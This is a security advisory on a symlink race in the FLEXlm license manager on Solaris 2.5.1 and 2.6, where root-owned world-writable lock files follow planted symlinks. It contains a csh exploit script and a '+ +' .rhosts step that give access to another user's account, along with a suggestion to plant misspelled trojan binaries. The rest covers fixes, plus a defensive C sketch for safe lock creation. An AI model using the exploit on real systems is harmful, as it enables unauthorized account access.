COMMAND
License Manager
SYSTEMS AFFECTED
Solaris 2.5.1, 2.6
PROBLEM
Joel Eriksson posted the following. License Manager on Solaris 2.5.1
tends to make stupid lockfiles owned by root and mode 666. That is
not good, since anyone could create root-owned files which they
then would be able to modify. It's an even bigger problem since it
just takes about a minute until the lockfile is created after it's
replaced with a symlink, which it follows. Let's take a look at
tmp:
bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd
And:
bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211
Joel tested the bug by removing lockESRI and making a symlink to
/var/tmp/test; in about a minute the file was created, owned by
root and world-writable.
Roger Harrison added the following. He discovered this too. A lock
file locksuntechd is created in /tmp, mode 666, owned by root and
group root. The program that is causing the problems is lmgrd
(FLEXlm v2.26d) or suntechd.
%ls -la /tmp/locksuntechd
-rw-rw-rw- 1 root root 0 Oct 22 12:51 locksuntechd
suntechd is in /opt/SUNWspro/SunTech_License/bin/. There is a log
file that contains some information about when the daemon goes up
or down; if users are exploiting it, you can also see entries
about the lock file not being available. It is in
/opt/SUNWspro/SunTech_License/license.log
So to exploit it, just remove the locksuntechd file and replace it
with a symlink to a file you want to create. It will not
overwrite existing files, from the testing that I did. Then the
link is followed and the new file is created with mode 666,
ownership root. You can then delete the symlink and create a new
one to somewhere else and it will work again and again and again.
Users could create .rhosts files, new system webpages, new trojan
binaries with names spelled slightly off that get misspelled often
(finger-fineger, pine-pien, ls-sl). Come on, tell me you never
typed one of those out wrong while you were typing fast!
------
#!/bin/csh -f
# Change target user name before running
# Iconoclast@thepentagon.com 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
Then wait a minute and cat + + >> ~targetuser/.rhosts
SOLUTION
Try creating a wrapper shell script that sets the umask before
launching the license manager. If you set it properly, the lock
files won't be world-writable (provided that the license manager
creates them with open(filename, O_EXCL | O_CREAT)).
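Added example, not from the advisory or from FLEXlm: a C sketch of how a daemon should create such a lock file so that a planted symlink is refused and the file is never mode 666, with an lstat-based audit check for listings like the ones above and a hypothetical helper that replays the race in a private temporary directory. The function names and the victim file name are assumptions.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Atomic lock-file creation: O_CREAT|O_EXCL fails with EEXIST when anything
 * (a planted symlink included) already sits at 'path', so the link is never
 * followed, and 0644 narrowed by umask keeps it from being world-writable.
 * Returns the open fd, or -1 with errno set. */
int create_lockfile(const char *path)
{
    mode_t old = umask(022);   /* what the suggested wrapper script would set */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    umask(old);
    return fd;
}

/* Audit check for the listings above: 1 if 'path' is a regular file with
 * mode o+w, else 0. lstat() so a symlink is not confused with its target. */
int is_world_writable_regular(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0) return 0;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_IWOTH)) ? 1 : 0;
}

/* Hypothetical helper replaying the race in a private temp directory: plant
 * a symlink at the lock path, check the safe open refuses it and the target
 * never appears, then check the real lock file is not mode 666. 0 = all ok. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", lock[64], target[64];
    int rc = 0, fd = -1;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(lock, sizeof lock, "%s/locksuntechd", dir);
    snprintf(target, sizeof target, "%s/victim.rhosts", dir);
    if (symlink(target, lock) != 0) rc = 2;
    else if ((fd = create_lockfile(lock)) != -1 || errno != EEXIST) rc = 3;
    else if (access(target, F_OK) == 0) rc = 4;   /* link followed: attack worked */
    if (fd >= 0) close(fd);
    unlink(lock);
    fd = create_lockfile(lock);                   /* nothing in the way now */
    if (rc == 0 && (fd < 0 || is_world_writable_regular(lock))) rc = 5;
    if (fd >= 0) close(fd);
    unlink(lock); unlink(target); rmdir(dir);
    return rc;
}
```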
The current version is 6.1, which corrects this. The bottom line
is that FLEXlm should NOT be run as root. All of this has been
addressed in the following Sun patches:
104217-01: FLEXlm (SUNWlicsw, SUNWlit) 4.1: CERT security advisory patch
104829-01: FLEXlm 4.1: Licensing (SUNWlicsw, SUNWlit) Jumbo Patch for Solaris SPARC
104830-01: FLEXlm Licensing (SUNWlicsw, SUNWlit) Jumbo Patch for Solaris Intel